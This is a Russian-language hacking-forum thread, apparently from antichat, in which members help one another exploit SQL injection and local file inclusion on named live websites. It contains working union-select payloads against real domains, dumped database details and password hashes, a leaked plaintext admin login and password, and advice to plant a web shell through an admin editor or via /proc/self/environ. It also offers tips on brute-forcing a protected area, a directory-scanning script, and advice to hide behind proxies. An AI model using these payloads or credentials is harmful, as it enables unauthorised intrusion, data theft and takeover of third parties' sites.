asianewsnet.net/news.php?id=999999999999+union+select+1,2,3,4,5,6, 7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 /*-+&sec=2

Возможно скрипт работает с другой БД.Укажите в запросе имя БД
-11+union+select+1,2,3,4,5,6,7,8,9,10,11,12+from+da tabase.tablename+--+
Имя базы данных:
-11+union+select+1,2,3,concat_ws(0x3a,table_name,ta ble_schema),5,6,7,8,9,10,11,12+FROM+INFORMATION_SC HEMA.TABLES+LIMIT+29,1+--+
Зы:Может не хватать прав на доступ
спасибо) А можно немного по подробней, из=за чего не отображалось с "-" а с "999999999999" заработало? и что означает "-+&sec=2"?
____________________________________
И еще я сюда напишу сразу, может кто подскажет, я тут перечитываю заново некоторые статьи, например вот в этой https://forum.antichat.ru/thread19844.html написано, По моим последним наблюдениям до 80% веб ресурсов сети подвержены подобным атакам как искать подобного рода уязвимости? почти все статьи что я читаю указывают параметр "?id=" и дальше пробовать подставлять разные значения, но тоесть получается не обязательно нужен "?id=" ? но и любой параметр подойдет, например встречал "?int=" "?e=" "?i=" , с ними также пробовать подставлять, или вообще на сайте (в урле) искать любое числовое значение и пробовать менять и подставлять к нему данные?

http://clean.kz/index.php?act=
Выдает ошибку Warning: main(/home/clean/data/public_html/modules/.php)
можно ли произвести локальный инклуд

И еще как узнать название всех таблиц в sql 4.1.25

спасибо) А можно немного по подробней, из=за чего не отображалось с "-" а с "999999999999" заработало? и что означает "-+&sec=2"?
____________________________________
И еще я сюда напишу сразу, может кто подскажет, я тут перечитываю заново некоторые статьи, например вот в этой https://forum.antichat.ru/thread19844.html написано, как искать подобного рода уязвимости? почти все статьи что я читаю указывают параметр "?id=" и дальше пробовать подставлять разные значения, но тоесть получается не обязательно нужен "?id=" ? но и любой параметр подойдет, например встречал "?int=" "?e=" "?i=" , с ними также пробовать подставлять, или вообще на сайте (в урле) искать любое числовое значение и пробовать менять и подставлять к нему данные?
Помоему просто мусор. Можно так.
http://asiane wsnet.net/news.php?id=1+union+select+1,2,3,4,5,6,7,8,9,10,11 ,12,13,14,15,16,17,18,19,20,21,22,23,24/*
На счёт второго вопроса, можно и с id=, и с int= и e=, это просто другие названия переменных и не более...Моё имхо, лучше для начала сделать простенький сайтец, php+mysql+ещё что-то), желательно с нуля, после чего тебе будет всё более понятней и интересней. Ествественно в ходе создания сайта, в теории ты выучишь хотя php и mysql.. Потому как сразу без какого-то рабочего опыта, будет сложновато.

http://clean.kz/index.php?act=
Выдает ошибку Warning: main(/home/clean/data/public_html/modules/.php)
можно ли произвести локальный инклуд

И еще как узнать название всех таблиц в sql 4.1.25

Так как там magic_quotes_gpc=on, то нулем не заменишь, разве что через /////////[...].

Торможу, не спал вторые сутки.Сильно не пинайте =)
Не могу обрезать запрос, как только не пробовал, добавляется ,3

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'order by 1/*,3' at line 1

2FaTRuS
шото канешн инклюдится!
http://clean.kz/index.php?act=../index

но тама base_dir() (

Торможу, не спал вторые сутки.Сильно не пинайте =)
Не могу обрезать запрос, как только не пробовал, добавляется ,3
Заюзай заместо /*, +--+

Заюзай заместо /*, +--+

/* и +--+ и +--+- и { и # и -- и вообще без close, все равно

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'order by 1(вариации close sql),3' at line 1

Уже всю голову поломал себе... Разве никто не сталкивался? Спать хочу =(

У тебя инъекция в лимите походу

и {
А это разве является коментарием?

http://clean.kz/index.php?act=
Выдает ошибку Warning: main(/home/clean/data/public_html/modules/.php)
можно ли произвести локальный инклуд

И еще как узнать название всех таблиц в sql 4.1.25

http://clean.kz/index.php?act=idx&id=-53+union+select+1,2,3,4,concat_ws(0x3a,version(),d atabase(),user())--

User : mysql_clean@localhost
Version : 4.1.25
Database : intserv_clean
OS : freebsd 6.3

http://clean.kz/index.php?act=idx&id=-53+union+select+1,2,3,4,concat_ws(0x3a,login,pass) +from+admin--
7b8fbb831c7c7163aa67b658ab3f3d64:28f9fb91cebfd9e08 dfc467ac2d735d9
http://clean.kz/admin/
Логин : cleanadmin
Пароль : 93mgpt5hm
В админке через "Редактор содержания" можешь залить шелл.
Таблицы в 4 ветке брутит надо (юзай SIPT)

Спасибо за помощь

/* и +--+ и +--+- и { и # и -- и вообще без close, все равно

Уже всю голову поломал себе... Разве никто не сталкивался? Спать хочу =(
Попробуй # в urlencode

народ, подскажите плз, что можно еще сделать.. допустим есть сайт, с ошибкой, пробую провести sql inj, вижу version() user() database(), кавычки не слешируются(magic_quotes_gpc = Off ?), пытаюсь вывести /etc/passwd , ничего не показывает, загрузить также ничего не смог, не хватает прав. Пытаюсь просмотреть таблицу, все поля выводит, но ничего интересного не могу найти, ни username, admin и тп, ничего нет. Что еще можно попробовать?

зы И вот еще
+group+by+1+--+ - пишет ошибку
+group+by+0+--+ - ошибки нет
как так может быть?

вопрос к знающим : нам что нибуть может дать каталог /proc и файлы внутри при експлуатации скулей? По поводу LFI знаю что возможно шелл проиинклудить подменив юсерагент ...
Ну если только у скули есть file_priv, не фильтруються кавычки, но нету прав для записи в папку доступной из веба, и есть lfi, то ты понел да?у /proc/self/enivron, насколько я знаю есть права на запись, ну ты понел?

вопрос к знающим : нам что нибуть может дать каталог /proc и файлы внутри при експлуатации скулей? По поводу LFI знаю что возможно шелл проиинклудить подменив юсерагент ...

1) В скуле нет.
2) Шелл можно проинклюдить только при allow_url_include = On, а всегда можно выполнить произвольный PHP код.

Есть скуль, версия 5, узнал нужную таблицу, колонки в ней, но когда делаю запрос вида:
site.ru/news.php?id=-1+union+select+version(),2,3+from+uzzerss-- кроме ошибки ничего не вижу... В чем может быть проблема? пробовал перевести в хэкс колонку и версию, но ничего толкового не вышло .

Есть скуль, версия 5, узнал нужную таблицу, колонки в ней, но когда делаю запрос вида:
site.ru/news.php?id=-1+union+select+version(),2,3+from+uzzerss-- кроме ошибки ничего не вижу... В чем может быть проблема? пробовал перевести в хэкс колонку и версию, но ничего толкового не вышло .

http://forum.antichat.ru/thread104591.html =\\\\

Попробуй # в urlencode
Пробовал также. В общем видимо иньекция действительно в лимите.Я вроде где то тут читал,что можно обойти, если ткнёте, буду признателен.Не могу найти. Или глючит =)

Есть скуль, версия 5, узнал нужную таблицу, колонки в ней, но когда делаю запрос вида:
site.ru/news.php?id=-1+union+select+version(),2,3+from+uzzerss-- кроме ошибки ничего не вижу... В чем может быть проблема? пробовал перевести в хэкс колонку и версию, но ничего толкового не вышло .

Имхо тут два варианта:
1. Либо нет доступа к самой таблице.
2. Либо табла находится в другой базе. Чтоб узнать базу пишем
asd.ru/yo.php?yo=-123+union+select+1,2,table_schema,4+from+informati on_schema.tables+where+table_name=0x757a7a65727373 +--+
Ну и соответственно выбираем union+select+1,2,group_concat(concat_ws(0x3a,log,p ass)),4+from+[table_schema].uzzerss+--+

Я чайник, по шаблону не получаеццо =((
в общем ситуация такая... делпю запрос
ввв.бла-бла-бла.ком/ID=1309+union+select+1,group_concat(database(),0x3 A,user(),0x3A,version()),3,4,5,6,7,8,9,10,11,12,13 ,14,15,16,17,18,19,20,21,22+--
получаю это вот tava:root@localhost:5.0.27
Кодирую tava в 16-тиричную систему, получаю это 0x74617661
Делаю запрос на таблицы этой бд
ввв.бла-бла-бла.ком/ID=1309+union+select+1,group_concat(table_name+SEP ARATOR+0x0b)+FROM+information_schema.tables+WHERE+ table_schema=0x74617661,3,4,5,6,7,8,9,10,11,12,13, 14,15,16,17,18,19,20,21,22+--
и мне пишут ошибку mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /data/www/.....

Я чайник, по шаблону не получаеццо =((
в общем ситуация такая... делпю запрос

получаю это вот tava:root@localhost:5.0.27
Кодирую tava в 16-тиричную систему, получаю это 0x74617661
Делаю запрос на таблицы этой бд

и мне пишут ошибку mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /data/www/.....
ввв.бла-бла-бла.ком/ID=1309+union+select+1,group_concat(table_name+SEP ARATOR+0x3a),3,4,5,6,7,8,9,10,11,12,13, 14,15,16,17,18,19,20,21,22+FROM+information_schema .tables+WHERE+ table_schema=0x74617661--

Спасибо Ctacok, понял свой косяк.. набрал ссылочку и получил эти вот ошибки..
Warning: extract() [function.extract]: First argument should be an array in /data/www/.../details.php on line 12...
Warning: Invalid argument supplied for foreach() in /data/www/.../details.php on line 40...
Warning: Invalid argument supplied for foreach() in /data/www/.../details.php on line 121...

Это с правами свфязано или запрос некорретный всетаки ?

Спасибо Ctacok, понял свой косяк.. набрал ссылочку и получил эти вот ошибки..
Warning: extract() [function.extract]: First argument should be an array in /data/www/.../details.php on line 12...
Warning: Invalid argument supplied for foreach() in /data/www/.../details.php on line 40...
Warning: Invalid argument supplied for foreach() in /data/www/.../details.php on line 121...

Это с правами свфязано или запрос некорретный всетаки ?
Скинь в пм линк сайта, посмотрю.

detail.php?EventID=-88+union+select+1,2,group_concat(table_name),4,5,6 ,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,2 4,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40, 41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57 +FROM+information_schema.tables+where+table_schema =0x74617661
:)

Ок.
detail.php?ID=34&MID=1400+union+select+1,group_concat(table_Name+Se parator+0x3a),3,4,5,6,7,8,9,10,11,12,13,14,15,16,1 7,18,19,20,21,22+from+information_schema.tables+WH ERE+table_schema=0x74617661--
Тот же сайт к сведению,просто там другая страница была.Кстати нормально всё работает,видимо он пробелы не удалил.

нашел:
Где-то с 40 сайтов на которых присутствует уязвимость LFI:
На большой части с них присутствуют:

/proc/self/environ
/proc/self/status
/proc/self/fd/2
/proc/self/fd/7
/proc/self/fd/10
/proc/version
/proc/self/cmdline
/proc/devices

Практичыске я проверил вручную большую часть найденных уязвимостей на залития шелла.
Что и не дало ни 1 жданного результата (true).

Вопрос: с тех директорий что я показал выше на все из них можно заливать шелл?
Вопрос2: как узнавать директорию в которую нужно заливать шелл, если вывода ошибки нет!
Пока все!)

нашел:
Где-то с 40 сайтов на которых присутствует уязвимость LFI:
На большой части с них присутствуют:

/proc/self/environ
/proc/self/status
/proc/self/fd/2
/proc/self/fd/7
/proc/self/fd/10
/proc/version
/proc/self/cmdline
/proc/devices

Практичыске я проверил вручную большую часть найденных уязвимостей на залития шелла.
Что и не дало ни 1 жданного результата (true).



Вопрос: с тех директорий что я показал выше на все из них можно заливать шелл?
Вопрос2: как узнавать директорию в которую нужно заливать шелл, если вывода ошибки нет!
Пока все!)

[censored]

а вот как заливать шелл будеш? тут уже нужно эксперементировать...

если присутствует /proc/self/environ пробуй с помощю user-agent'a подменить код на свой...

либо через логи апача, либо через сессии-но тут есть одно но, нужно знать путь:)

сама по себе уязвимость lfi дает возможность читать произвольные файлы в системе...
омг, что за чушь?=\

2 Alf0x0ns
советую ознакомиться с http://forum.antichat.ru/showpost.php?p=1088072&postcount=11, думаю это частично решит твою проблему залития шеллов в данном случае

Вопрос: с тех директорий что я показал выше на все из них можно заливать шелл?
то что ты привел выше, не директории.

Вопрос2: как узнавать директорию в которую нужно заливать шелл, если вывода ошибки нет!
поиск и чтение конфигов вебсервера (к примеру /etc/httpd/conf/httd.conf)
поиск пхпинфо на самом сайте и сайтах рядом

я понимаю что это вроди как не по теме. Да и целая тема подобная на мой вопрос уже есть. но все спрошу здесь:
Вот начал я изучать sql инъекции недавно. Что мне за это грозит в плане проблем (в том числе и креминально-адменистративных). Я просто посылаю всякие там запросы к БД. узнаю версию, имена таблиц, полей, логов, пасов в них. Но ничево вредоносного не делаю. даже хеши на стараюсь разкодировать. Просто занимаюсь этим в целях общего развития. Я так понимаю что они там могут анализировать все запросы которые к ним поступаю ну или по крайней мере те в которых содаржаться слова select, union и т.д. И без проблем могут узнать мой IP, а из него номер телефона и адресс. Как вы думаете они это могут, а если могут то станут? (я ведь им ниче плохогоо не зделал).

2 020963
Юзай прокси и не будет подобных проблем.
я понимаю что это вроди как не по теме.
это плохо, что понимаешь, но все равно пишешь
Что мне за это грозит в плане проблем (в том числе и креминально-адменистративных)
тебя могут "креминально" наказать, т.ч. заготавливай крем.

я понимаю что это вроди как не по теме. Да и целая тема подобная на мой вопрос уже есть. но все спрошу здесь:
Вот начал я изучать sql инъекции недавно. Что мне за это грозит в плане проблем (в том числе и креминально-адменистративных). Я просто посылаю всякие там запросы к БД. узнаю версию, имена таблиц, полей, логов, пасов в них. Но ничево вредоносного не делаю. даже хеши на стараюсь разкодировать. Просто занимаюсь этим в целях общего развития. Я так понимаю что они там могут анализировать все запросы которые к ним поступаю ну или по крайней мере те в которых содаржаться слова select, union и т.д. И без проблем могут узнать мой IP, а из него номер телефона и адресс. Как вы думаете они это могут, а если могут то станут? (я ведь им ниче плохогоо не зделал).

- Конечно настучать могут и должны это делать в целях своей же безопасности)
- Ну станут это ищо как сказать .. все зависит от руководства(владелеца) сервера. Больше шансов получить если сайт на котором тестиш уязвимости есть крупным проектом!

http://dtis.ru/index.php?module=Static_Docs&func=view&f=fdfdfd.html

получем ошибку
location : /var/www/vhosts/dtis.ru/httpdocs/modules/Static_Docs/data/fdfdfd.html

ну судя по всему это инклуд, хотя хз...

пытаюсь приинклудить шелл, но ошибка остается...

в чем проблема?


и второй вопрос.
www.riskcenter.com
имя и пароль из БД admin;admin

админка /admin (но потом идет редирект на http://admin801.securesites.net/cgi-bin/manage.pl/index.html

также имеется директория конфиг.пхп , но походу она пуста), пхпинфо тоже присутсвует...
phpmyadmin в однименно диретории...

реально ли тут применить "читалку" и попасть в пхпмай админ или каким либо другим образом, если да, то как?

http://adm in801.securesites.net/risk2.tar а это случаем не екап сайта? :)

попробывал залить через двойной запрос..
http://admin801.securesites.net/story.php?id=-19469+union+select+0x2d3120756e696f6e2073656c65637 420312c312c332c342c352c362c372c382c392c31302c31312 c31322c31332c31342c31352c31362c31372c31382c3139206 6726f6d206d7973716c2e7573657220696e746f206f7574666 96c6520272f746d702f7465737474322e70687027,2,3,4,5, 6,7,8,9,10,11,12,13,14,15,16,17+from+mysql.user--+

Но что-то не хочет лить даже в /tmp, странно..Может что пропустил подуставший...Хотя обычный подзапрос типа union select 1,2,3..19 from mysql.user where name = 'root', работает на ура.

Второй вариант, читаешь конфиг, заходишь в phpmyadmin и заливаешь шелл ) я уже :) Скажу по секрету, папка с правами там есть :)

вот вопрос таков:
/search.cgi?q='
в ответ
Software error:
DBD::mysql::db selectrow_array failed: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ')' at line 1
поставил ') или комбинаации не пашет.
Прошу совета

вот вопрос таков:

в ответ

поставил ') или комбинаации не пашет.
Прошу совета

Как понять комбинация не пашет? Ты подставил только это?Покажи полностью строчку которую ты подставляешь в уязвимый скрипт?

Переформулируй пожалуйста вопрос, с более точной конкретикой описаний действий и что ты хочешь получить в результате.

PS "В правильно поставленном вопросе, половина ответа на него" (с) Не помню кто ...

ну например если делать запрос /search.cgi?q='+order+by+100-- просто без ошибок открывается обшая категория и на order+by+1 тоже такое. Думал редир но не похожа на того.
карочи на ' ругается и показывает ')

Открывается общая категория, потому что редирект. А syntax это уже не фильтруется переменная. Нужно смотреть по ситуации, телепатов тут нет.
Oo никто тебя телепатом не назвал ))
Я прекрасно знаю где редирект где нет. Если нету дельных советов не путай. Просто вопрос было в том как обойти если ругается на одинарную кавычку добавив )

to YuNi|[c
Основываясь на ошибке, можно предположить, что параметр 'q' не обрамлен в одинарные кавычки в запросе ... следовательно запрос к базе можно составить и без ее использования
Например: ?q=1) union select 1,2,3,4,5/*

Так пройдет только без LIKE условия, если запрос будет примерно таким

mysql_query("SELECT title FROM content WHERE (LIKE %$q%)")
То /* не обрежет %) ... запрос выполнится и не вернется никакого результата... что бы обрезать %) в LIKE запросе за место /* используй #

Только тут походу блинд,так что можешь начинать подбирать:)

о спс за подробные обьяснения, буду пробовать

Еще вопрос если ссылка будет вида
galle/99/1/1/8
то как правильно сделать запрос, так как уже почти все сайты так настравиваются.
galle/99/1/1/8'+order+by+10-- или galle/99/1/1/8'/order/by/10--

asd/5/12/8'+order+by+10+--+

Iceangel_: данный плюс говорит о незнании синтаксиса комментариев mysql...

Ayowa
данный плюс говорит о том, что я люблю симметрию, мало того, подобный стиль встречается не только у меня. Мне прекрасно известно о том, что в документации говорится только про последний символ после однострочного комментария.
http://phpclub.ru/mysql/doc/comments.html
А вот еще слова чувака I-I()/Ib:
(Для тех кто в танке “--“ это знак начала комментария все после него будет отброшено, еще хочу обратить ваше внимание на то что после него должен быть обязательно пробел(Так написано в документации к MYSQL) и кстати перед ним тоже)
Источник: https://forum.antichat.ru/thread43966.html
Выходит, он тоже не знает синтаксис комментариев mysql.
Безусловно, это является моей критической ошибкой, epic fail я бы сказал.

Не раз встречал что в инъекциях в ЧПУ знак плюса + переваривается как-то не так а если использовать пробел то все работает как надо.
Раз уж заговорили о ЧПУ у мя тоже есть вопрос: точно есть иньекция в /id-28.html, например /id-28-1.html показывает /id-27.html и даже есть вывод ошибок.

http://www.alyans-pr.ru/news/id-28.html

Но вот добиться чего-либо толкового, хотя бы and 1=1 не удалось. Буду рад услышать ваши предложения.

как то так
alyans-pr.ru/news/id-(-28)union(select(1),2,version(),4,5,6,7).html

Спасибо, блин что-то я туплю, не выспался видать, про скобочки совсем забыл. Все равно, ветка четвертая, лениво ковырять, пойду искать что-нить поприличнее.

DarkAngel']to YuNi|[c
Основываясь на ошибке, можно предположить, что параметр 'q' не обрамлен в одинарные кавычки в запросе ... следовательно запрос к базе можно составить и без ее использования
Например: ?q=1) union select 1,2,3,4,5/*
Эмм с чего это можно так предположить?
Просто он не закомментировал запрос и у него получается примерно вот такая фигня:

примерный запрос:
SELECT title FROM content WHERE User LIKE ('%$q%')
после ')
SELECT title FROM contentWHERE User LIKE ('%')%')
Вот и ошибка near ')'

DarkAngel']
Так пройдет только без LIKE условия, если запрос будет примерно таким

mysql_query("SELECT title FROM content WHERE (LIKE %$q%)")
То /* не обрежет %) ... запрос выполнится и не вернется никакого результата... что бы обрезать %) в LIKE запросе за место /* используй #

Если запрос будет таким, он не сработает, like %$q% совсем без кавычек заюзать не получится, ну и комментарий "/*" запросто срежет %) если составить нормальный запрос:

SELECT title FROM content WHERE User LIKE ('%$q%')
q=1')+union+select+1/*
SELECT title FROM content WHERE User LIKE ('%1')+union+select+1/*%')

to jokester

Прошу прошения,действительно пропустил в SQL запросе '' при использование LIKE.

А теперь непосредственно по теме.

Вот ошибка из самого первого поста

Software error:
DBD::mysql::db selectrow_array failed: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ')' at line 1


Если взять такой запрос:
SELECT title FROM content WHERE User LIKE ('%$q%')
и передать параметр q=' , то вылетит другая ошибка:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '')' at line 1


Что показывает не соответствие ошибок с постом пользователя YuNi|[c. Для получения такой же ошибки, как в посте пользователя должен иметь место фактор,когда переменная не обрамлена в одинарные кавычки ... исходя из этого вряд ли в том запросе присутствует LIKE оператор или присутствует, но уже после уязвимой переменной ...

Подскадите пожалуйста. Ума не приложу
Вот код:

include("config.php");
$response=mysql_query("SELECT * FROM articles WHERE id='".$_GET['id']."'");
$result=mysql_fetch_array($response);

...

echo "
<table width=\"100%\">
<tr><th>".$result['title']."</th></tr>
<tr><td><img src=".$result['image']." width=200><br>".$result['text']."</td></tr>
</table><br>
";


Почему не проходит инъекция? когда подставишь ковычку - ошибку есть mysql_fetch_array().
А странно то, что если убрать рядом id ковычки одинарные, т.е. запрос станент таким

mysql_query("SELECT * FROM articles WHERE id=".$_GET['id']."");

то обычная инъекция проходит! В чём такая странность из-за ковычек. подскажите плиз

ребят понял уже оказывается там нету скуля а просто ошибка. Так как насчет этого вопроса. Прочел много статей но про скули таких видов не видал

Еще вопрос если ссылка будет вида

galle/99/1/1/8

то как правильно сделать запрос, так как уже почти все сайты так настравиваются.

galle/99/1/1/8'+order+by+10/* или galle/99/1/1/8'/order/by/10/*

Подскадите пожалуйста. Ума не приложу
Вот код:

include("config.php");
$response=mysql_query("SELECT * FROM articles WHERE id='".$_GET['id']."'");
$result=mysql_fetch_array($response);

...

echo "
<table width=\"100%\">
<tr><th>".$result['title']."</th></tr>
<tr><td><img src=".$result['image']." width=200><br>".$result['text']."</td></tr>
</table><br>
";


Почему не проходит инъекция? когда подставишь ковычку - ошибку есть mysql_fetch_array().
А странно то, что если убрать рядом id ковычки одинарные, т.е. запрос станент таким

mysql_query("SELECT * FROM articles WHERE id=".$_GET['id']."");

то обычная инъекция проходит! В чём такая странность из-за ковычек. подскажите плиз

Запрос то ты какой передаешь страннице?Напиши его пожалуйста, т.к без него тебе вряд ли помогут разобраться с ошибкой, а могут написать готовое решение ... получив его, знаний полученных в итоге будет 0. А ошибку тебе разберут,объяснят и подскажут почему было не правильно ... я думаю с этого будет больший толк.

А странно то, что если убрать рядом id ковычки одинарные, т.е. запрос станент таким

mysql_query("SELECT * FROM articles WHERE id=".$_GET['id']."");



как она здесь пройдет тут екранировать то надо в коде двойные кавычки или слешами...

Пройдет и очень просто ... при
mysql_query("SELECT * FROM articles WHERE id=".$_GET['id']."");

id = 3 union select 1,2,3,4,5/* вот и весь запрос ... кавычки даже не к чему.

ребят понял уже оказывается там нету скуля а просто ошибка. Так как насчет этого вопроса. Прочел много статей но про скули таких видов не видал
Еще вопрос если ссылка будет вида galle/99/1/1/8 то как правильно сделать запрос, так как уже почти все сайты так настравиваются. galle/99/1/1/8'+order+by+10/* или galle/99/1/1/8'/order/by/10/*

первый вариант. но закрывай запрос по-другому. а то модррерайт не поймёт тебя
http://site.com/galle/99/1/1/8'+order+by+10+--+/

mysql_query("SELECT * FROM articles WHERE id=".$_GET['id']."");

обясните кто нить пожалуйста проверить нет сервера и компа нет , не доганяю тогда, что сдесь с " в переменной!!!??? Сижу не через свой комп а гуглить что то толку мало...
Тут ничего особенного ))))
Это идентично mysql_query("SELECT * FROM articles WHERE id=$_GET[id]");

Теперь инекция пройдет ?:)

mysql_query("SELECT * FROM articles WHERE id=".$_GET['id']."");

обясните кто нить пожалуйста проверить нет сервера и компа нет , не доганяю тогда, что сдесь с " в переменной!!!??? Сижу не через свой комп а гуглить что то толку мало...
Я так и не понял вопроса =\
в коде, который ты предоставил есть следующее:
mysql_query() выполняет mysql запрос. в качестве входного параметра - строка.
в твоем случае это строка "SELECT * FROM articles WHERE id=".$_GET['id'].""
эта строка остоит из трёх частей
- "SELECT * FROM articles WHERE id="
- $_GET['id']
- ""
все эти части соединяются воедино и получается одна строка.
первая и третья части обрамлены в двойные ковычки. вторая часть - это данные которые поступают через GET
если $_GET['id'] будет например так: site/?id=123 то вся строка mysql запроса примет вид:
"SELECT * FROM articles WHERE id=123"
sql-injection:
site/?id=123 and 1=0 union select 1,2,3
запрос примет вид:
"SELECT * FROM articles WHERE id=123 and 1=0 union select 1,2,3"

Подскадите пожалуйста. Ума не приложу
Вот код:

include("config.php");
$response=mysql_query("SELECT * FROM articles WHERE id='".$_GET['id']."'");
$result=mysql_fetch_array($response);

...

echo "
<table width=\"100%\">
<tr><th>".$result['title']."</th></tr>
<tr><td><img src=".$result['image']." width=200><br>".$result['text']."</td></tr>
</table><br>
";


Почему не проходит инъекция? когда подставишь ковычку - ошибку есть mysql_fetch_array().
А странно то, что если убрать рядом id ковычки одинарные, т.е. запрос станент таким

mysql_query("SELECT * FROM articles WHERE id=".$_GET['id']."");

то обычная инъекция проходит! В чём такая странность из-за ковычек. подскажите плиз
Наеврное просто магические кавычки включены,что мозги то трахать людям ^_^

ребят понял уже оказывается там нету скуля а просто ошибка. Так как насчет этого вопроса. Прочел много статей но про скули таких видов не видал

Я же тебе уже написал.
Возьмем в качестве примера вот этот вариант:
galle/99/1/1/8'/order/by/10/*

Если исходить из логики построения вот такого запроса, можно сделать вывод, что в бд попадает вот такое нечто:
select * from newz where asd='galle 99 1 1 8 order by 10 *' ...
Естественно, мускул такого не поймет.

Имхо, исходная строка имеет вид:
galle.php?year=99&month=1&day=1&hernya=8
Замечательный модуль апача, mod_rewrite, это пережевывает и выпихивает то, что мы имеем.
Сам несколько раз сталкивался с подобными штуками, к примеру :
asd.com/gallery/234658234+and+1=7+--+.html

Поскольку апач модифицирует юрлку с помощью регулярных выражений, скорее всего, на обратном пути в процессе "расшифровки" в качестве разделителя он использует "/" так что возможно, в данном случае, комментарий типа "/*" не подойдёт, хотя скажу сразу, что особо сильно в работу мод_рерайт не въезжал и это рассуждение о многострочном комментарии может быть неверным.
ЗЫ, кому интересно, доки по мод_рерайту лежат тута:
http://httpd.apache.org/docs/1.3/mod/mod_rewrite.html

Если я что-то неправильно сказал - поправьте.

Вопросец, если через site.ru/phpmyadmin/ делать into outfile 'temp.txt', то куда по дефолту может скидываться файл, нету подручных средств чтобы проверить.

v1d0qz не имеет значение через что давать БД команды .. пхпмайадмин это всего лишь ГУИ ... поэтому файл если не ошибаюсь если не указываеть полную дерикторию зальётся в папку с Базой ... но в этом я не уверен =)

блин все таки вот пришлос в студию линк:
пххп://allbest.ru/union/search.cgi?q=1')%20union+select%201,2+--+

никакие запросы не подходит ((

Вопросец, если через site.ru/phpmyadmin/ делать into outfile 'temp.txt', то куда по дефолту может скидываться файл, нету подручных средств чтобы проверить.

Если указать слэш перед названием, то зальется в корень, а если не указывать, как у тебя в примере, то он скорее всего зальется туда, где хранятся записи самого мускула, вот тебе резалт теста на локалхосте:
Запрос:
SELECT * FROM injection.uzaz INTO OUTFILE '/dump.txt'

Итоговое расположение:
[DISK]:\usr\local\mysql5\data\injection

Подскадите пожалуйста. Ума не приложу
Вот код:

include("config.php");
$response=mysql_query("SELECT * FROM articles WHERE id='".$_GET['id']."'");
$result=mysql_fetch_array($response);

...

echo "
<table width=\"100%\">
<tr><th>".$result['title']."</th></tr>
<tr><td><img src=".$result['image']." width=200><br>".$result['text']."</td></tr>
</table><br>
";


Почему не проходит инъекция? когда подставишь ковычку - ошибку есть mysql_fetch_array().

http://site.ru/script.php?id=-1'+union+select+1,2,3,4+--+

Будет работать при mq=off

А странно то, что если убрать рядом id ковычки одинарные, т.е. запрос станент таким
то обычная инъекция проходит! В чём такая странность из-за ковычек. подскажите плиз

mysql_query("SELECT * FROM articles WHERE id=".$_GET['id']."");

Когда стоят кавычки '', запрос получается:

$response=mysql_query("SELECT * FROM articles WHERE id='1+union+select+1,3,4+--+'");

php вернет ошибку из-за незакрытой кавычки. Нужно закрыть кавычку и делать запрос:

$response=mysql_query("SELECT * FROM articles WHERE id='1' union select 1,2,3,4+--+'");

Читай: http://forum.antichat.ru/thread19844.html

елемент $_GET['id'] можно взять в {} чтоб запрос выполнялся ...

Iceangel_+ я прав (протестить негде)?
прав, но зачем? ведь но суть вопроса не в этом.

:.]MySql вернет ошибку из-за незакрытой кавычки.
бред, что за "незакрытая кавычка"? и в данном случае ошибку mysql_fetch_array возвращает не mysql, а php.

Всем привет,
у меня такой вопрос есть японский сайт http://www.104club.info/
там есть подраздел http://www.104club.info/indicator
но при переходе он требует логин и пароль, кто может подсказать как его обойти?
Заранее спасибо

так что с пххп://allbest.ru/union/search.cgi?q=1')%20union+select%201,2+--+ ничего незяли сделать?

Всем привет,
у меня такой вопрос есть японский сайт http://www.104club.info/
там есть подраздел http://www.104club.info/indicator
но при переходе он требует логин и пароль, кто может подсказать как его обойти?
Заранее спасибо

Обойти никак, можно побрутить...

Всем привет,
у меня такой вопрос есть японский сайт http://www.104club.info/
там есть подраздел http://www.104club.info/indicator
но при переходе он требует логин и пароль, кто может подсказать как его обойти?
Заранее спасибо

Обойти можно, как правильно подметил nemaniak, только брутом. Попробуй просканить сайтец на полезные файлы/папки, авось и .htpasswd доступен для чтения :) . Может че найдешь.

Лови скриптик на скорую руку

<form action='<?=$_SERVER[PHP_SELF]?>' method='POST'>
<pre>
URL without ending slash!:<a href='#' title='exmpl: http://www.site.com' style='text-decoration: none'>?</a><input type='text' name='host' size='50' /><br/>
File with dirs:<a href='#' title='exmpl: dirs.txt (with Path)' style='text-decoration: none'>?</a> <input type='text' name='dirs' size='50' value='./dirs.txt'/><br/>
<input type='submit' name='gogo' value='Scan' />
</pre>
</form>
<hr/>
<?php
if($_POST['gogo'] && trim($_POST['host']) != '' && trim($_POST['dirs']) != ''){
$host = $_POST['host'];
$dirs = @file($_POST['dirs']);
if (!$dirs) die ('Can`t open file');
foreach ($dirs as $v){
$temp = @get_headers($host.trim($v));
$found = false;
if (preg_match('#200#', $temp[0])) {echo $host.'<b>'.$v.'</b> found! <br/>';}
if (preg_match('#403#', $temp[0])) {echo $host.'<b>'.$v.'</b> is forbidden! <br/>';}
if (preg_match('#404#', $temp[0])) { continue;}
}

} else if ($_POST['gogo'] && (trim($_POST['host']) == '' || trim($_POST['dirs']) == '')) {
die('All fields required');
}
?>

Файл dirs должен быть вот такого вида:
/admin/
/admin.php
/indicator
...

авось и .htpasswd доступен для чтения
Не несите бред, еще с версий 1.* по дефолту в конфиге апача стоит deny на все .ht* файлы